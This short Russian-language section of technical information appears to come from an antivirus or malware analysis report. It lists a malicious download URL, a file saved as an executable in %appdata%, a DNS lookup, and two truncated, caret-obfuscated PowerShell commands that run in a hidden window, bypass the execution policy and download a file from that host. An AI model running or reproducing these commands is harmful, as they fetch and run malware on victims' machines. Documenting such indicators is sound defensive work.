Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^E^rSHell.^ex^e^ -^ExEc^UTI^o^N^PoLi^C^y Byp^a^Ss -n^O^PROFile -w^in^D^OWSTy^lE^ h^iDD^e^N ^(^nEW-OBJ^ect SySt^EM.NET.W^Eb^C^LIeN^t).DoW^NloaDfiL^e^('http://zofelaseo.top/rea...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "poW^E^rSHell.^ex^e^ -^ExEc^UTI^o^N^PoLi^C^y Byp^a^Ss -n^O^PROFile -w^in^D^OWSTy^lE^ h^iDD^e^N ^(^nEW-OBJ^ect SySt^EM.NET.W^Eb^C^LIeN^t).DoW^NloaDfiL^e^('http://zofelaseo.top/rea...' (со скрытым окном)